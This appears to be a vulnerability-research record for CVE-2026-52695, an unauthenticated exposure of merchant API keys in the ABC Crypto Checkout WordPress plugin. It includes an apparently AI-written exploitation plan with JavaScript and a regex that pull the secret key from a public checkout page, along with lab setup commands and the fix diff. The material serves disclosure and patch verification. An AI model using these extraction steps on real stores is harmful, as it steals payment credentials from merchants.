[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyEfQNqgt1z4lE7kP2-3qP1DNaoD_ynUKX7tADToODCA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-52695","abc-crypto-checkout-unauthenticated-information-exposure","ABC Crypto Checkout \u003C= 1.8.2 - Unauthenticated Information Exposure","The ABC Crypto Checkout plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.2. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","payerurl-crypto-currency-payment-gateway-for-woocommerce",null,"\u003C=1.8.2","1.8.3","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-06-10 00:00:00","2026-06-18 13:22:16",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Feeb0353e-2086-4255-bb28-6bb20ab327b1?source=api-prod",9,[22,23,24,25,26],"assets\u002Fjs\u002Fpayerurl-admin-payment-settings.js","class-payerurl-gateway-blocks.php","class-payerurl-gateway.php","payerurl.php","readme.txt","researched",false,3,"This exploitation research plan targets **CVE-2026-52695**, a sensitive information exposure vulnerability in the **ABC Crypto Checkout** plugin (version \u003C= 1.8.2).\n\n### 1. Vulnerability Summary\nThe vulnerability exists within the implementation of the WooCommerce Blocks integration for the Payerurl gateway. Specifically, the class `WC_Gateway_Payerurl_Blocks_Support` (in `class-payerurl-gateway-blocks.php`) improperly handles configuration data. By returning the entire settings array to the WooCommerce Blocks registry without filtering out sensitive fields, the plugin exposes the merchant's **Secret Key** and **Public Key** to any user—including unauthenticated visitors—who accesses the checkout page.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** The public WooCommerce Checkout page (rendered using the Checkout Block).\n*   **Target Data:** The `payerurl_secret_key` and `payerurl_public_key`.\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:**\n    1.  The Payerurl gateway must be enabled.\n    2.  The store must be using the modern WooCommerce Checkout Block (standard in WooCommerce 8.0+).\n    3.  API credentials must be saved in the gateway settings.\n\n### 3. Code Flow\n1.  **Plugin Initialization:** `Payerurl::woocommerce_payerurl_block_support()` (in `payerurl.php`) registers the payment method block support by instantiating `WC_Gateway_Payerurl_Blocks_Support`.\n2.  **Data Preparation:** The `WC_Gateway_Payerurl_Blocks_Support::initialize()` method retrieves all gateway settings:\n    `$this->settings = get_option('woocommerce_wc_payerurl_gateway_settings', array());`\n3.  **Data Exposure:** The `get_payment_method_data()` method (required by the `AbstractPaymentMethodType` interface) returns the unfiltered `$this->settings` array.\n4.  **Frontend Localization:** WooCommerce Blocks calls `get_payment_method_data()` and localizes the returned array into the frontend's `wcSettings` global object (specifically for the checkout block) so that the JavaScript-based payment component can access its configuration.\n5.  **Information Leak:** The data is rendered into the HTML of the checkout page as a JSON object within a `\u003Cscript>` tag.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability **does not require a WordPress nonce**. The exposure occurs during the standard rendering of the public Checkout page. No AJAX requests or authenticated endpoints are needed to trigger the leak; it is a passive information disclosure.\n\n### 5. Exploitation Strategy\nThe exploitation involves navigating to the checkout page and extracting the JSON-encoded configuration data.\n\n**Step-by-Step Plan:**\n1.  **Identify Checkout URL:** Locate the store's checkout page (usually `\u002Fcheckout\u002F`).\n2.  **Navigate and Inspect:** Use the browser to load the checkout page.\n3.  **Data Extraction:** Use the `browser_eval` tool to retrieve the sensitive settings from the `wcSettings` global object.\n\n**HTTP Request (Verification):**\n```http\nGET \u002Fcheckout\u002F HTTP\u002F1.1\nHost: [target_host]\nUser-Agent: Mozilla\u002F5.0\nAccept: text\u002Fhtml\n```\n\n**Browser Evaluation (Extraction):**\nExecute the following JavaScript to extract the keys from the WooCommerce settings object:\n```javascript\n\u002F\u002F Access the payment method data from the global wcSettings object\nconst payerurlSettings = window.wcSettings?.paymentMethodData?.['wc_payerurl_gateway'];\n\nif (payerurlSettings) {\n    console.log(\"Public Key:\", payerurlSettings.payerurl_public_key);\n    console.log(\"Secret Key:\", payerurlSettings.payerurl_secret_key);\n    return payerurlSettings;\n} else {\n    return \"Gateway settings not found in wcSettings.\";\n}\n```\n\n### 6. Test Data Setup\nTo reproduce this in a test environment:\n1.  **Install Requirements:** Install WordPress, WooCommerce, and the ABC Crypto Checkout plugin (v1.8.2).\n2.  **Configure Gateway:** Use WP-CLI to simulate a merchant configuration:\n    ```bash\n    wp option update woocommerce_wc_payerurl_gateway_settings '{\n        \"enabled\": \"yes\",\n        \"payerurl_public_key\": \"PUB-TEST-123456\",\n        \"payerurl_secret_key\": \"SEC-TEST-654321\",\n        \"title\": \"Crypto Payment\"\n    }' --format=json\n    ```\n3.  **Ensure Checkout Block:** Create a checkout page using the Block editor:\n    ```bash\n    wp post create --post_type=page --post_title=\"Checkout\" --post_status=publish --post_content='\u003C!-- wp:woocommerce\u002Fcheckout \u002F-->'\n    ```\n4.  **Set as WooCommerce Checkout:**\n    ```bash\n    wp option update woocommerce_checkout_page_id $(wp post list --name=\"checkout\" --post_type=page --field=ID)\n    ```\n\n### 7. Expected Results\nUpon navigating to the checkout page, the `browser_eval` tool should return a JSON object containing the configured keys:\n```json\n{\n  \"enabled\": \"yes\",\n  \"payerurl_public_key\": \"PUB-TEST-123456\",\n  \"payerurl_secret_key\": \"SEC-TEST-654321\",\n  \"title\": \"Crypto Payment\"\n}\n```\nThe presence of `payerurl_secret_key` in the frontend response confirms the information exposure.\n\n### 8. Verification Steps\nAfter the HTTP\u002Fbrowser-based extraction, verify that the extracted data matches the database state using WP-CLI:\n```bash\nwp option get woocommerce_wc_payerurl_gateway_settings --format=json\n```\nCompare the `payerurl_secret_key` field from the database to the value captured via the browser. If they match, the information disclosure is verified.\n\n### 9. Alternative Approaches\nIf `window.wcSettings` is not directly accessible or formatted differently, search the page source for the Payerurl ID:\n1.  **Source Search:** Perform a string search in the HTML source for `payerurl_secret_key`.\n    ```bash\n    # Conceptual search via browser_eval\n    browser_eval(\"document.documentElement.innerHTML.match(\u002Fpayerurl_secret_key\\\":\\\"(.*?)\\\"\u002F)[1]\")\n    ```\n2.  **Legacy Checkout Check:** If the store uses the Shortcode-based checkout (`[woocommerce_checkout]`) instead of the Block-based checkout, the vulnerability may not be exploitable via the `AbstractPaymentMethodType` path, as that class specifically services the Blocks API. In that case, check for `wp_localize_script` calls in `class-payerurl-gateway.php` that might also leak settings to the legacy frontend.","The ABC Crypto Checkout plugin for WordPress exposes sensitive API credentials, including the merchant's Secret Key and Public Key, to unauthenticated users. This occurs because the WooCommerce Blocks integration class returns the unfiltered settings array to the frontend, which is then rendered into the global window.wcSettings JavaScript object on the public checkout page.","\u002F* class-payerurl-gateway-blocks.php:15 *\u002F\n        public function initialize()\n        {\n            $this->settings = get_option('woocommerce_wc_payerurl_gateway_settings', array());\n            $this->gateway  = new WC_Payerurl();\n        }\n\n---\n\n\u002F* class-payerurl-gateway-blocks.php:49 *\u002F\n        public function get_payment_method_data()\n        {\n            return $this->settings;\n        }","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpayerurl-crypto-currency-payment-gateway-for-woocommerce\u002F1.8.2\u002Fclass-payerurl-gateway-blocks.php\t2026-05-15 05:58:06.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpayerurl-crypto-currency-payment-gateway-for-woocommerce\u002F1.8.3\u002Fclass-payerurl-gateway-blocks.php\t2026-06-03 09:27:40.000000000 +0000\n@@ -49,9 +48,28 @@\n             return array('wc-payerurl-payments-blocks');\n         }\n \n+        \u002F**\n+         * FIX (CVE \u002F Patchstack report):\n+         * Previously returned $this->settings which exposed payerurl_secret_key\n+         * and payerurl_public_key to the browser via window.wc.wcSettings.\n+         * Now returns only the display fields the frontend checkout UI needs.\n+         * Credentials never leave the server.\n+         *\u002F\n         public function get_payment_method_data()\n         {\n-            return $this->settings;\n+            return [\n+                'title'       => $this->get_setting('title', 'Crypto Payment via PayerURL'),\n+                'description' => $this->get_setting('description', 'Pay securely with cryptocurrency.'),\n+                'supports'    => array_filter($this->gateway->supports, [$this->gateway, 'supports']),\n+            ];\n+        }\n+\n+        \u002F**\n+         * Helper to safely read a single setting without exposing the full array.\n+         *\u002F\n+        private function get_setting($key, $default = '')\n+        {\n+            return isset($this->settings[$key]) ? $this->settings[$key] : $default;\n         }\n     }","The exploit is a passive information disclosure requiring no authentication or nonces. An attacker identifies a WooCommerce store using the modern Checkout Block with the PayerURL gateway enabled. By navigating to the checkout page, the attacker can access the browser's developer console and inspect the 'window.wcSettings' global object. The sensitive 'payerurl_secret_key' and 'payerurl_public_key' are stored within the 'paymentMethodData.wc_payerurl_gateway' property of this object, as the plugin fails to filter them out before localizing the payment method data for the JavaScript frontend.","gemini-3-flash-preview","2026-06-26 01:32:12","2026-06-26 01:33:19",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","1.8.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpayerurl-crypto-currency-payment-gateway-for-woocommerce\u002Ftags\u002F1.8.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpayerurl-crypto-currency-payment-gateway-for-woocommerce.1.8.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpayerurl-crypto-currency-payment-gateway-for-woocommerce\u002Ftags\u002F1.8.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpayerurl-crypto-currency-payment-gateway-for-woocommerce.1.8.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpayerurl-crypto-currency-payment-gateway-for-woocommerce\u002Ftags"]